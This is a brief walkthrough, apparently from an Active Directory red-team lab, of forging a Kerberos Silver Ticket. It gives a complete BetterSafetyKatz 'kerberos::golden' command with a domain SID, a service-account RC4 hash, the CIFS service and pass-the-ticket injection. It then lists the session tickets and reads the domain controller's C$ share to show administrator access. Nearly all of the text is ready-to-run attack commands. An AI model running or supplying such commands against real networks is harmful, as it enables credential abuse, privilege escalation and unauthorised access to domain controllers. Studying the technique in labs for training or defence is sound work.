We can Forge a service ticket if we have the secrets of the service account and can Access it as Administrators

Now let’s Abuse Silver Ticket using SafetyKatz.exe

.\\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /target:us-dc.us.techcorp.local /service:cifs /rc4:f4492105cb24a843356945e45402073e /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Now let’s go and list the tickets in our session

klist

Now let’s list the C$ of the us-dc

dir \\\\us-dc.us.techcorp.local\\C$

Notice that we have permissions and we successfully did it